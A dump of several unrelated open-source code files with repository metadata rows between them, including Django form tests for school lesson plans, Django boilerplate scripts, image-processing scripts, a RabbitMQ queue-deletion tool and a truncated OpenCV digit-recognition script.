            'proceso-elementos_curriculares-0-procesos_didacticos-'\
            'MAX_NUM_FORMS': '10',
            'proceso-elementos_curriculares-0-procesos_didacticos-0-'\
            'name': 'lorem',
            'proceso-elementos_curriculares-0-procesos_didacticos-0-'\
            'description': 'lorem ipsum',
            'proceso-elementos_curriculares-0-procesos_didacticos-0-'\
            'tiempo': 'lorem ipsum',
            'proceso-elementos_curriculares-0-procesos_didacticos-0-'\
            'recursos': 'lorem ipsum',
            'proceso-elementos_curriculares-0-procesos_didacticos-1-'\
            'name': 'lorem',
            'proceso-elementos_curriculares-0-procesos_didacticos-1-'\
            'description': 'lorem ipsum',
            'proceso-elementos_curriculares-0-procesos_didacticos-1-'\
            'tiempo': 'lorem ipsum',
            'proceso-elementos_curriculares-0-procesos_didacticos-1-'\
            'recursos': 'lorem ipsum',
            'proceso-elementos_curriculares-1-procesos_didacticos-'\
            'TOTAL_FORMS': '1',
            'proceso-elementos_curriculares-1-procesos_didacticos-'\
            'INITIAL_FORMS': '0',
            'proceso-elementos_curriculares-1-procesos_didacticos-'\
            'MIN_NUM_FORMS': '0',
            'proceso-elementos_curriculares-1-procesos_didacticos-'\
            'MAX_NUM_FORMS': '10',
            'proceso-elementos_curriculares-1-procesos_didacticos-0-'\
            'name': 'lorem',
            'proceso-elementos_curriculares-1-procesos_didacticos-0-'\
            'description': 'lorem ipsum',
            'proceso-elementos_curriculares-1-procesos_didacticos-0-'\
            'tiempo': 'lorem ipsum',
            'proceso-elementos_curriculares-1-procesos_didacticos-0-'\
            'recursos': 'lorem ipsum',
        }
    def test_valid_data(self):
        formset = ElementoCurricularFormset(self.data)
        assert formset.is_valid() is True, 'The formset should be valid'
    def test_empty_data(self):
        # Without the ManagementForm keys Django raises ValidationError.
        with pytest.raises(ValidationError,
                           match='Los datos de ManagementForm faltan o han '
                           'sido manipulados'):
            formset = ElementoCurricularFormset({})
            formset.is_valid()
    def test_invalid_data(self):
        # Corrupt both a parent FK and a nested destreza FK.
        data = self.data
        data['asignatura'] = 'lorem ipsum'
        data['elementos_curriculares-0-destreza'] = 'lorem ipsum'
        formset = ElementoCurricularFormset(data)
        assert formset.is_valid() is False, 'The formset should be invalid'
class TestPlanAnualForm(PlanificacionesTestCase):
    """Validation tests for ``PlanAnualForm`` (yearly plan form)."""
    def setUp(self):
        super().setUp()
        # Complete, valid payload built from the base-class fixtures.
        self.data = {
            'name': 'Plan de Anual1',
            'ano_lectivo': '2019-2020',
            'docentes': 'David Padilla, Tatiana Carpio',
            'asignatura': self.asignatura.id,
            'curso': self.curso_1.id,
            'paralelos': 'A y C',
            'carga_horaria': 20,
            'semanas_trabajo': 10,
            'semanas_imprevistos': 2,
            'objetivos_generales': [str(self.general_1.id),
                                    str(self.general_2.id)],
            'objetivos_curso': [str(self.objetivo_1.id),
                                str(self.objetivo_2.id)],
            'objetivos_generales_curso': [str(self.general_1.id),
                                          str(self.general_2.id)],
            'ejes_transversales': 'Lorem ipsum dolor sit amet.',
            'bibliografia': 'Lorem ipsum dolor sit amet.',
            'observaciones': 'Tecnica usada',
        }
    def test_valid_data(self):
        form = PlanAnualForm(self.data)
        assert form.is_valid() is True, 'The form should be valid'
    def test_empty_data(self):
        form = PlanAnualForm({})
        assert form.is_valid() is False, 'The form should be invalid'
    def test_invalid_data(self):
        # Non-numeric FK value must invalidate the form.
        data = self.data
        data['asignatura'] = 'lorem ipsum'
        form = PlanAnualForm(data)
        assert form.is_valid() is False, 'The form should be invalid'
class TestDesarrolloUnidadFormset(PlanificacionesTestCase):
    """Validation tests for the DesarrolloUnidad formset."""
    def setUp(self):
        super().setUp()
        self.data = {
            'asignatura': self.asignatura.id,
            'curso': self.curso_1.id,
            # Formset Desarrollo Unidad 1
            'desarrollo_unidades-TOTAL_FORMS': '2',
            'desarrollo_unidades-INITIAL_FORMS': '0',
            'desarrollo_unidades-MIN_NUM_FORMS': '0',
            'desarrollo_unidades-MAX_NUM_FORMS': '1000',
            'desarrollo_unidades-0-unidad': self.unidad_1.id,
            'desarrollo_unidades-0-objetivos': [self.objetivo_1.id,
                                                self.objetivo_2.id],
            'desarrollo_unidades-0-objetivos_generales': [self.general_1.id,
                                                          self.general_2.id],
            'desarrollo_unidades-0-destrezas': [self.destreza_1.id,
                                                self.destreza_2.id],
            'desarrollo_unidades-0-orientaciones_metodologicas': 'lorem ipsum',
            'desarrollo_unidades-0-semanas': 7,
            # Formset Desarrollo Unidad 2
            'desarrollo_unidades-1-unidad': self.unidad_1.id,
            'desarrollo_unidades-1-objetivos': [self.objetivo_1.id,
                                                self.objetivo_2.id],
            'desarrollo_unidades-1-objetivos_generales': [self.general_1.id,
                                                          self.general_2.id],
            'desarrollo_unidades-1-destrezas': [self.destreza_1.id,
                                                self.destreza_2.id],
            'desarrollo_unidades-1-orientaciones_metodologicas': 'lorem ipsum',
            'desarrollo_unidades-1-semanas': 8,
        }
    def test_valid_data(self):
        formset = DesarrolloUnidadFormset(self.data)
        assert formset.is_valid() is True, 'The formset should be valid'
    def test_empty_data(self):
        # Missing ManagementForm data raises instead of merely invalidating.
        with pytest.raises(ValidationError,
                           match='Los datos de ManagementForm faltan o han '
                           'sido manipulados'):
            formset = DesarrolloUnidadFormset({})
            formset.is_valid()
    def test_invalid_data(self):
        data = self.data
        data['asignatura'] = 'lorem ipsum'
        data['desarrollo_unidades-0-unidad'] = 'lorem ipsum'
        formset = DesarrolloUnidadFormset(data)
        assert formset.is_valid() is False, 'The formset should be invalid'
class TestPlanUnidadForm(PlanificacionesTestCase):
    """Validation tests for ``PlanUnidadForm`` (unit plan form)."""
    def setUp(self):
        super().setUp()
        self.data = {
            'name': 'Plan de Unidad1',
            'ano_lectivo': '2019-2020',
            'docentes': 'David Padilla, Tatiana Carpio',
            'unidad': self.unidad_1.id,
            'asignatura': self.asignatura.id,
            'curso': self.curso_1.id,
            'paralelos': 'A y C',
            'periodos': 20,
            'tiempo': 20,
            'objetivos': [str(self.objetivo_1.id),
                          str(self.objetivo_2.id)],
            'objetivos_generales': [str(self.general_1.id),
                                    str(self.general_2.id)],
            'necesidad_adaptacion': 'Lorem ipsum dolor sit amet.',
            # NOTE(review): hyphenated key — Django form fields normally use
            # underscores ('adaptacion_curricular'); an unknown key is simply
            # ignored by the form, so the tests pass either way. Confirm
            # against the form definition.
            'adaptacion-curricular': 'Lorem ipsum dolor sit amet.',
        }
    def test_valid_data(self):
        form = PlanUnidadForm(self.data)
        assert form.is_valid() is True, 'The form should be valid'
    def test_empty_data(self):
        form = PlanUnidadForm({})
        assert form.is_valid() is False, 'The form should be invalid'
    def test_invalid_data(self):
        # Non-numeric FK value must invalidate the form.
        data = self.data
        data['asignatura'] = 'lorem ipsum'
        form = PlanUnidadForm(data)
        assert form.is_valid() is False, 'The form should be invalid'
class TestActividadesAprendizajeFormset(PlanificacionesTestCase):
    """Validation tests for the ActividadAprendizaje formset."""
    def setUp(self):
        super().setUp()
        self.data = {
            'asignatura': self.asignatura.id,
            'curso': self.curso_1.id,
            # Formset Actividades Aprendizaje 1
            'actividades_aprendizaje-TOTAL_FORMS': '2',
            'actividades_aprendizaje-INITIAL_FORMS': '0',
            'actividades_aprendizaje-MIN_NUM_FORMS': '0',
            'actividades_aprendizaje-MAX_NUM_FORMS': '1000',
            'actividades_aprendizaje-0-destrezas': [self.destreza_1.id,
                                                    self.destreza_2.id],
            'actividades_aprendizaje-0-estrategias_metodologicas': 'lorem ips',
            'actividades_aprendizaje-0-recursos': 'lorem ipsum',
            'actividades_aprendizaje-0-instrumentos_evaluacion': 'lorem ipsum',
            # Formset Actividades Aprendizaje 2
            'actividades_aprendizaje-1-destrezas': [
                self.destreza_1.id,
                self.destreza_2.id
            ],
            'actividades_aprendizaje-1-estrategias_metodologicas': 'lorem ips',
            'actividades_aprendizaje-1-recursos': 'lorem ipsum',
            'actividades_aprendizaje-1-instrumentos_evaluacion': 'lorem ipsum',
        }
    def test_valid_data(self):
        formset = ActividadAprendizajeFormset(self.data)
        assert formset.is_valid() is True, 'The formset should be valid'
    def test_empty_data(self):
        # Missing ManagementForm data raises instead of merely invalidating.
        with pytest.raises(ValidationError,
                           match='Los datos de ManagementForm faltan o han '
                           'sido manipulados'):
            formset = ActividadAprendizajeFormset({})
            formset.is_valid()
    def test_invalid_data(self):
        data = self.data
        data['asignatura'] = 'lorem ipsum'
        data['actividades_aprendizaje-0-destrezas'] = 'lorem ipsum'
        formset = ActividadAprendizajeFormset(data)
        assert formset.is_valid() is False, 'The formset should be invalid'
class TestPlanDestrezasForm(PlanificacionesTestCase):
    """Validation tests for ``PlanDestrezasForm`` (skills plan form)."""
    def setUp(self):
        super().setUp()
        self.data = {
            'name': 'Plan de Unidad1',
            'ano_lectivo': '2019-2020',
            'docentes': 'David Padilla, Tatiana Carpio',
            'unidad': self.unidad_1.id,
            'asignatura': self.asignatura.id,
            'curso': self.curso_1.id,
            'paralelos': 'A y C',
            'periodos': 20,
            'semana_inicio': 'lorem ipsum dolor sit amet.',
            'ejes_transversales': 'lorem ipsum dolor sit amet.',
            'objetivos': [str(self.objetivo_1.id),
                          str(self.objetivo_2.id)],
            'objetivos_generales': [str(self.general_1.id),
                                    str(self.general_2.id)],
            'destrezas': [str(self.destreza_1.id),
                          str(self.destreza_2.id)],
            'estrategias_metodologicas': 'lorem ipsum',
            'recursos': 'lorem ipsum',
            'actividades_evaluacion': 'lorem ipsum',
            'necesidad_adaptacion': 'Lorem ipsum dolor sit amet.',
            # NOTE(review): hyphenated key (see TestPlanUnidadForm) —
            # unknown keys are ignored by Django forms; confirm intent.
            'adaptacion-curricular': 'Lorem ipsum dolor sit amet.',
        }
    def test_valid_data(self):
        form = PlanDestrezasForm(self.data)
        assert form.is_valid() is True, 'The form should be valid'
    def test_empty_data(self):
        form = PlanDestrezasForm({})
        assert form.is_valid() is False, 'The form should be invalid'
    def test_invalid_data(self):
        # Non-numeric FK value must invalidate the form.
        data = self.data
        data['asignatura'] = 'lorem ipsum'
        form = PlanDestrezasForm(data)
        assert form.is_valid() is False, 'The form should be invalid'
| [
"davidpadilla.f22@gmail.com"
] | davidpadilla.f22@gmail.com |
720a56c10cccc12611a5449ed08c5b5bd97011cb | 62265be73a441f2bb4e3319cd67b80df46482ddd | /backend/env/bin/django-admin.py | 40a1625db5e01e5461685f0152c0602bee0cc54f | [] | no_license | HuuThang-1402/Web_Demo | c16c687eb7e5e3e634e8cd00916abd9a0eef57e3 | 1f8c8b9db074ced89c81de854adff43868591c71 | refs/heads/main | 2023-07-25T18:15:31.531037 | 2021-09-01T15:11:43 | 2021-09-01T15:11:43 | 402,098,944 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 698 | py | #!/home/estella/Code/Web/ReactJS/djreact/backend/env/bin/python
# When the django-admin.py deprecation ends, remove this script.
import warnings
from django.core import management
try:
from django.utils.deprecation import RemovedInDjango40Warning
except ImportError:
raise ImportError(
'django-admin.py was deprecated in Django 3.1 and removed in Django '
'4.0. Please manually remove this script from your virtual environment '
'and use django-admin instead.'
)
if __name__ == "__main__":
warnings.warn(
'django-admin.py is deprecated in favor of django-admin.',
RemovedInDjango40Warning,
)
management.execute_from_command_line()
| [
"thang.nguyen2018@hcmut.edu.vn"
] | thang.nguyen2018@hcmut.edu.vn |
0db65fdb7ef44d4f2743946601e0a9f2ce3b83c1 | 06b72967c7a0e0df5cf4cab9fc9c96055410136f | /Web Eng/venv/bin/rst2man.py | 34044a34734a8d45c588e8008da252feef6af27f | [] | no_license | YonaMoreda/WEB_ENG_2019 | c0be2661c833563b09121ae447d6c60c00787f89 | 2116b29a0ad80ff8a132655bd66bf1320fb798f3 | refs/heads/master | 2022-03-05T04:00:09.698800 | 2019-11-06T12:17:37 | 2019-11-06T12:17:37 | 212,578,721 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 632 | py | #!/Users/wine_king/Desktop/Web Eng/venv/bin/python
# Author:
# Contact: grubert@users.sf.net
# Copyright: This module has been placed in the public domain.
"""
man.py
======
This module provides a simple command line interface that uses the
man page writer to output from ReStructuredText source.
"""
import locale
try:
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline, default_description
from docutils.writers import manpage
description = ("Generates plain unix manual documents. " + default_description)
publish_cmdline(writer=manpage.Writer(), description=description)
| [
"r.c.patrona@student.rug.nl"
] | r.c.patrona@student.rug.nl |
18c3149c607ffbaa74d665b406d17f4317de36b1 | bff37feea8ee123c6ec4a147e3591d89dc1a2421 | /backend/manage.py | 44693110ac920023873ab512def90d73d690fabf | [] | no_license | msherrington/basketApp | c00b3ccb6a37fae6186771cc061e7cd5b9b61cd1 | eccc8011c14134a4613ecee0a32d4d3c4905ea05 | refs/heads/master | 2022-04-01T11:49:06.407156 | 2020-02-18T22:34:36 | 2020-02-18T22:34:36 | 240,595,732 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 538 | py | #!/usr/bin/env python
import os
import sys
if __name__ == '__main__':
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'basket.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| [
"git@marksherrington.uk"
] | git@marksherrington.uk |
c17cfddbe71929b5dd9f44731af66f2d81cb0f1d | a0342ba96c88cafae5855ffa9a493df979d03caf | /index/urls.py | bed7af56439270865c619834af546f825e26982e | [] | no_license | themusecatcher/lab-manage-system | 37ddf3f4ec5e9683dcf01c951b07851143f867d2 | c979f2d75a3920cbad822804e9732dcb0a6b1f42 | refs/heads/master | 2023-06-08T12:41:43.186488 | 2021-06-16T09:11:54 | 2021-06-16T09:11:54 | 377,435,986 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 478 | py | # MyDjango URL Configuration
from django.urls import path
from .views import *
urlpatterns = [
#首页路由,id为用户主键id
path('index/<int:id>/<int:page>', indexView, name='index'),
#用户id和每条通知记录的主键id(noticeId),type用来判断用户是否是在当前页面进行刷新
path('notice/<int:id>/<int:noticeId>/<int:type>',noticeView,name='notice'),
#用户帮助
path('userHelp/<int:id>',userHelpView,name='userHelp'),
]
| [
"d_muses@163.com"
] | d_muses@163.com |
71581e2aa28a19aa508f908fff09ae9da3e41017 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_connoisseur.py | f2ebfdee7349c5f0eb2d9d637ed4b4d9b3670125 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 419 | py |
# class header
class _CONNOISSEUR():
    """Auto-generated word model for the noun "connoisseur".

    Holds the word's dictionary data; ``run`` returns the JSON payload.
    """
    def __init__(self,):
        self.name = "CONNOISSEUR"
        self.definitions = [u'a person who knows a lot about and enjoys one of the arts, or food, drink, etc. and can judge quality and skill in that subject: ']
        self.parents = []
        # NOTE(review): "childen" is a generator typo for "children";
        # kept as-is for compatibility with the sibling word classes.
        self.childen = []
        self.properties = []
        self.jsondata = {}
        self.specie = 'nouns'
    def run(self, obj1=None, obj2=None):
        """Return the word's JSON payload; ``obj1``/``obj2`` are unused.

        The defaults used to be mutable lists (``[]``), a classic Python
        pitfall; ``None`` is behaviour-identical because the arguments
        are never read.
        """
        return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
8fbe1926271a509d55450e06a266c466ed4ae9c9 | d10dddad690b42e1c62207d6eaaa31c5c858c434 | /prePro_pipeline_3D/norm.py | 16d41f3270204d8389dd3e7eab54b89826b4c667 | [
"Apache-2.0"
] | permissive | wahlby-lab/graph-iss | 874d5985d7eab96220f701b2087bb0e9ee0783ca | ef794ee615da91c17c55b2e2d6101cec3873df29 | refs/heads/master | 2021-08-17T04:41:24.870882 | 2020-07-02T11:19:20 | 2020-07-02T11:19:20 | 199,853,991 | 10 | 3 | null | null | null | null | UTF-8 | Python | false | false | 2,737 | py | """ Compute normalization intervals for each channel and round.
Parameters
----------
sys.argv[1] : input csv file contaning an array of input images
sys.argv[2] : upper percentile value of 98th percentile distri-
bution of image patches for signal level estimation.
sys.argv[3] : number of running threads. Each thread run over
an image.
sys.argv[4] : output csv file where to store computed intervals
sys.argv[5] : number of random patches used to estimate norma-
lization intervals
"""
import numpy as np
from skimage import io
from scipy import stats
import sys
import pandas as pd
import pickle
from sklearn.feature_extraction.image import extract_patches_2d
from joblib import Parallel,delayed
def faster_mode1D(a):
    """Return ``(mode, count)`` of a 1-D sample, faster than scipy.stats.mode.

    Mirrors scipy's behaviour: when no value repeats, the smallest value
    is returned with a count of 1.

    :param a: non-empty 1-D array-like of numbers.
    :return: tuple ``(mode_value, repeat_count)``.
    """
    arr = np.asarray(a)  # would be _chk_array
    v, c = stats.find_repeats(arr)
    if len(c) == 0:
        # No repeated value: mimic "first value after sorting" behaviour.
        # Use min() instead of the previous in-place ``arr.sort()``, which
        # silently reordered the *caller's* array (np.asarray does not copy
        # when the input is already an ndarray).
        return arr.min(), 1.
    else:
        pos = c.argmax()
        return v[pos], c[pos]
def runParallel(row, seed):
    """Estimate background and signal levels for one image (one worker).

    :param row: dataframe row whose ``File`` column is the image path.
    :param seed: random seed shared by all workers so every image is
        sampled with the same patch layout.
    :return: ``[background_level, signal_level]``.
    """
    out = []
    img = io.imread(row.File)
    # Maximum-intensity projection along the first axis.
    # Assumes a 3-D z-stack image -- TODO confirm with acquisition format.
    img = np.amax(img, axis=0)
    patch_size = 128
    patches = extract_patches_2d(img, (patch_size, patch_size),
                                 max_patches=int(sys.argv[5]),
                                 random_state=int(seed))
    del(img)
    patch = []
    # Keep only patches where at least 3/4 of the pixels are non-zero.
    nonZero_px = patch_size*patch_size/4*3
    for i in range(len(patches)):
        # Bug fix: the closing parenthesis used to sit after the comparison
        # (``len(a >= t)``), which tested "patch has any non-zero pixel"
        # instead of "patch has at least nonZero_px non-zero pixels".
        if len(patches[i][patches[i] != 0]) >= nonZero_px:
            patch.append(patches[i])
    del(patches)
    # Lower bound: mean over patches of the mode of the non-zero pixels.
    bkg = np.mean([faster_mode1D(patch[i][patch[i]!=0])[0] for i in range(len(patch))])
    print(bkg)
    out.append(bkg)
    # Upper bound: 98th percentile of the per-patch sys.argv[2] percentiles.
    signal = np.percentile([np.percentile(patch[i], float(sys.argv[2])) for i in range(len(patch))], 98)
    print(signal)
    out.append(signal)
    return out
# Main script: estimate per-channel/per-cycle normalization intervals.
imgCSV = pd.read_csv(sys.argv[1],sep='\t')
n_chs = 6
n_cycles = int(len(imgCSV)/6)
# NOTE(review): np.random.random_integers is deprecated in modern numpy;
# np.random.randint(1, 101) is the replacement.
seed = np.random.random_integers(1,100)
# One worker per input image; each returns [background, signal].
res = Parallel(n_jobs=int(sys.argv[3]))(delayed(runParallel)(row,seed) for i, row in imgCSV.iterrows())
# img_stats[cycle, channel, (lower, upper)]
img_stats = np.zeros((n_cycles, n_chs, 2))
# Inputs arrive in fixed per-cycle order; map them to channel slots.
for i in range(0,len(res),6):
    img_stats[int(i/n_chs),5,0] = res[i+5][0]; img_stats[int(i/n_chs),5,1] = res[i+5][1] # chanA
    img_stats[int(i/n_chs),4,0] = res[i+4][0]; img_stats[int(i/n_chs),4,1] = res[i+4][1] # chanC
    img_stats[int(i/n_chs),0,0] = res[i][0]; img_stats[int(i/n_chs),0,1] = res[i][1] # chanDO
    img_stats[int(i/n_chs),3,0] = res[i+3][0]; img_stats[int(i/n_chs),3,1] = res[i+3][1] # chanG
    img_stats[int(i/n_chs),1,0] = res[i+1][0]; img_stats[int(i/n_chs),1,1] = res[i+1][1] # chanNuclei
    img_stats[int(i/n_chs),2,0] = res[i+2][0]; img_stats[int(i/n_chs),2,1] = res[i+2][1] # chanT
# NOTE(review): file handle is never closed; a ``with open(...)`` would be safer.
pickle.dump(img_stats,open(sys.argv[4],'wb'))
| [
"gabriele.partel@it.uu.se"
] | gabriele.partel@it.uu.se |
80e15aa2909bac3ed5c0402bcf8ea3b7316693af | d7b3257892d3d0cdad76f8b6990f84ab09ff743a | /testing.py | b2348a25826ffb723a4afcb3827ff6e752c5a5e3 | [] | no_license | ninmonkey/roguelike-skeleton | f8398135921a19ca1c1bb855d527c62cfd8ae44e | 552f2e5927b205034821b5ba2c75c764cf1348e4 | refs/heads/master | 2022-07-19T00:09:00.892215 | 2018-09-06T17:00:30 | 2018-09-06T17:00:30 | 144,588,502 | 0 | 0 | null | 2022-06-21T21:24:02 | 2018-08-13T14:07:54 | Python | UTF-8 | Python | false | false | 51 | py | # load map from json dump
# pathfind
# test result
| [
"ninmonkeys@gmail.com"
] | ninmonkeys@gmail.com |
e9031bde2c5620bbc80017e57ea1f7ecde3b471c | 8c1c8eb854287575e7cfadf8c67f14365f9d8835 | /rabbit_tools/delete.py | a0d95d44189098e9446012ca5037ab88bb573a04 | [
"MIT"
] | permissive | andrzejandrzej/rabbit-tools | 1ae5c0eb0f4ea37ec34176a4181fb792a005eea2 | f7785144b8bcd23c824cb70790d6f0cdb80143f8 | refs/heads/master | 2021-06-13T16:37:52.253934 | 2020-05-20T12:23:02 | 2020-05-20T12:23:02 | 99,705,794 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,030 | py | # -*- coding: utf-8 -*-
import logging
from rabbit_tools.base import RabbitToolBase
from rabbit_tools.lib import log_exceptions
logger = logging.getLogger(__name__)
class DelQueueTool(RabbitToolBase):
    """Interactive AMQP queue-deletion tool.

    Pure configuration subclass: the class attributes below parameterize
    the generic run loop implemented by RabbitToolBase.
    """
    description = ('Delete an AMQP queue. Do not pass a queue\'s name as an argument, '
                   'if you want to choose it from the list. You can use choose a single queue '
                   'from dynamically generated list or enter a range (two numbers separated by'
                   ' `-`) or a sequence of numbers separated by `,`.')
    # Name of the management-client method invoked per selected queue.
    client_method_name = "delete_queue"
    # Messages used by the base class for reporting.
    queue_not_affected_msg = "Cannot delete queue"
    queues_affected_msg = "Successfully deleted queues"
    no_queues_affected_msg = "No queues have been deleted."
    # Deleted queues disappear, so their menu numbers must be dropped.
    do_remove_chosen_numbers = True
def main():
    """Console entry point: run the deletion tool, logging any errors."""
    with log_exceptions():
        del_queue_tool = DelQueueTool()
        try:
            del_queue_tool.run()
        except KeyboardInterrupt:
            # Python 2 print statement: exit quietly on Ctrl-C.
            print "Bye"
if __name__ == '__main__':
    main()
| [
"andrzej.debicki@nask.pl"
] | andrzej.debicki@nask.pl |
5ea9fd73389fcab34e9655f5099a8674175c8caa | 4a08eebc535859cf9650f6c5b57007a777bf0ee9 | /post_processing/rawdata_dump_and_formating.py | 3e160d83b64499190dc7f33d04883fd4aac60eac | [] | no_license | Hanq416/Temperature-image_dataloggingsystem | 752d0de6e7a6bc9f6522f8a4a6ec517aa1bc2c96 | 7b670508a550d61f522c9bf8c3f249be98f3dd78 | refs/heads/main | 2023-01-22T09:58:36.129038 | 2020-11-10T17:53:50 | 2020-11-10T17:53:50 | 311,740,193 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,216 | py | import os, sys
from time import time
class Reformat(object):
    """Re-format raw 'therm_records' files into per-date sorted text files.

    Parsing relies on exact character positions/markers in the raw lines
    (``:``, ``d``, ``_``) -- the expected input format is not visible here,
    so the index arithmetic below is kept verbatim.
    """
    def __init__(self, path_out):
        # Output directory for the sorted files.
        self.po = path_out
    def data_sorting(self):
        """Parse 'therm_records' from the *current directory* and append
        the extracted values to the per-date output file."""
        f_name = 'therm_records'
        f = open (f_name,'r')
        lines = f.readlines()
        f.close()
        # Date is taken from the first (header) line.
        d = self.date_read(lines[0])
        s = ''
        for line in lines:
            # Skip header-like lines (presumably starting with 'D'ate).
            if line[0] == 'D':
                continue
            j = int(0)
            beg = int(0)
            end = int(0)
            for i in range(0,len(line)):
                if line[i] == ':':
                    # Value starts two chars after the colon.
                    beg = i + 2
                elif line[i] == 'd' and i > beg:
                    # Value ends two chars before the 'd' terminator
                    # (presumably a unit such as 'deg' -- TODO confirm).
                    end = i - 2
                    s = s + line[beg:end]+ ' '
                    j += 1
                    beg = 0
                    end = 0
                    # Exactly four values per record line.
                    if j == 4:
                        s = s + '\n'
                        break
        self.data_write(d, s)
    def date_read(self, line0):
        """Extract the date token from the header line.

        The date ends at the third underscore; ``beg``/``end`` raise
        NameError if the expected markers are absent (format assumption).
        """
        c = int(0)
        for i in range(0, len(line0)):
            if line0[i] == ':':
                beg = i+2
            if line0[i] == '_':
                c += 1
            if c == 3:
                end = i
                date = line0[beg:end]
                break
        print(date)
        return date
    def data_write(self, date, s):
        """Append the formatted block *s* to 'thermal_sorted_<date>.txt'."""
        outname = 'thermal_sorted_' + date +'.txt'
        out = self.po + '/' + outname
        f = open (out,'a+')
        f.write('%s\n' %s)
        f.close()
# MAIN FUNCTION:
# Input the work path below.
work_path = 'H:/Signal_recording_project_dataprocessing/Lawrence_SOUTH_W19toW20' # CHANGE HERE!, attention: '\' need to be changed to '/' !!!!!!
######
# End of user-editable section.
t1 = time()
inpth = work_path + '/therm_backup'
opth = work_path + '/out'
if not os.path.exists(opth):
    os.makedirs(opth)
rf = Reformat(opth)
# Visit every sub-directory of the backup tree; data_sorting() reads the
# 'therm_records' file relative to the current working directory.
for root,dirs,files in os.walk(inpth):
    for l in dirs:
        dir_path = inpth + '/' +l
        try:
            os.chdir(dir_path)
        except Exception as err:
            print(err)
        try:
            rf.data_sorting()
        except:
            # Deliberate best-effort: directories without a parseable
            # 'therm_records' file are skipped silently.
            continue
print ('done!')
t2 = time()
ts = t2 - t1
print('time consumption: %02f secs' %ts)
| [
"noreply@github.com"
] | noreply@github.com |
561c9a9ee112d5f6150be9f3711ed50e07da41ca | bfb33e7801e6d2789219a018189e53d96fd2b4a7 | /PF/testing_code.py | 1b160914c9b6b716a6e677a76b41eebadb8f2579 | [] | no_license | MiguelBenavides/Lab_Robotics | 4c8cb48db78915130f4296ea05b3d957573a78f3 | 3662e198091fa1ba47b5ebe9bb14dfcd44c4f497 | refs/heads/master | 2021-03-27T17:15:19.192470 | 2018-05-16T15:08:33 | 2018-05-16T15:08:33 | 123,169,493 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,265 | py | """
testing_code.py
This code segments blue color objects. Then makes an
AND-bitwise operation between the mask and input images.
With the resulting blue mask image then creates a roi,
inside this region numbers can be detected.
author: Miguel Benavides, Laura Morales
date created: 9 May 2018
universidad de monterrey
"""
# import required libraries
import numpy as np
import matplotlib.pyplot as plt
import cv2
import time
####### training part #############
samples = np.loadtxt('generalsamples.data',np.float32)
responses = np.loadtxt('generalresponses.data',np.float32)
responses = responses.reshape((responses.size,1))
model = cv2.ml.KNearest_create()
model.train(samples,cv2.ml.ROW_SAMPLE,responses)
####### testing part #############
#Frame width & Height
w=640
h=480
def order_points(pts):
    """Order four quadrilateral corners as TL, TR, BR, BL (float32).

    The top-left corner has the smallest x+y sum and the bottom-right
    the largest; the top-right has the smallest y-x difference and the
    bottom-left the largest.
    """
    ordered = np.zeros((4, 2), dtype="float32")
    coord_sum = pts.sum(axis=1)
    coord_diff = np.diff(pts, axis=1)
    ordered[0] = pts[np.argmin(coord_sum)]    # top-left
    ordered[2] = pts[np.argmax(coord_sum)]    # bottom-right
    ordered[1] = pts[np.argmin(coord_diff)]   # top-right
    ordered[3] = pts[np.argmax(coord_diff)]   # bottom-left
    return ordered
def four_point_transform(image, pts):
    """Warp the quadrilateral described by *pts* to an axis-aligned rectangle.

    The output size is fixed to half the global frame size (w/2 x h/2).
    Returns the perspective-corrected image.
    """
    # Order corners consistently (tl, tr, br, bl) before building the mapping.
    rect = order_points(pts)
    (tl, tr, br, bl) = rect
    # BUG FIX: use integer division. Under Python 3, w/2 is a float and
    # cv2.warpPerspective requires an integer (width, height) pair.
    maxWidth = w // 2
    maxHeight = h // 2
    # Destination rectangle corners in the same (tl, tr, br, bl) order.
    dst = np.array([
        [0, 0],
        [maxWidth - 1, 0],
        [maxWidth - 1, maxHeight - 1],
        [0, maxHeight - 1]], dtype = "float32")
    # compute the perspective transform matrix and then apply it
    M = cv2.getPerspectiveTransform(rect, dst)
    warped = cv2.warpPerspective(image, M, (maxWidth, maxHeight))
    # return the warped image
    return warped
def auto_canny(image, sigma=0.33):
    """Run Canny edge detection with thresholds derived from the image median.

    The lower/upper thresholds are (1 - sigma) and (1 + sigma) times the
    median pixel intensity, clamped to [0, 255].
    """
    median_val = np.median(image)
    low = int(max(0, (1.0 - sigma) * median_val))
    high = int(min(255, (1.0 + sigma) * median_val))
    return cv2.Canny(image, low, high)
def resize_and_threshold_warped(image):
    """Convert a warped BGR patch to a binary black/white image.

    The threshold is the midpoint between the darkest and brightest pixel
    of a blurred copy of the grayscale image.
    """
    #Resize the corrected image to proper size & convert it to grayscale
    #warped_new = cv2.resize(image,(w/2, h/2))
    warped_new_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    #Smoothing Out Image
    blur = cv2.GaussianBlur(warped_new_gray,(5,5),0)
    #Calculate the maximum pixel and minimum pixel value & compute threshold
    min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(blur)
    threshold = (min_val + max_val)/2
    # NOTE(review): the threshold is computed from the *blurred* image but
    # applied to the un-blurred grayscale image — confirm this is intended.
    #Threshold the image
    ret, warped_processed = cv2.threshold(warped_new_gray, threshold, 255, cv2.THRESH_BINARY)
    #return the thresholded image
    return warped_processed
#Font Type
font = cv2.FONT_HERSHEY_SIMPLEX

# create a VideoCapture object
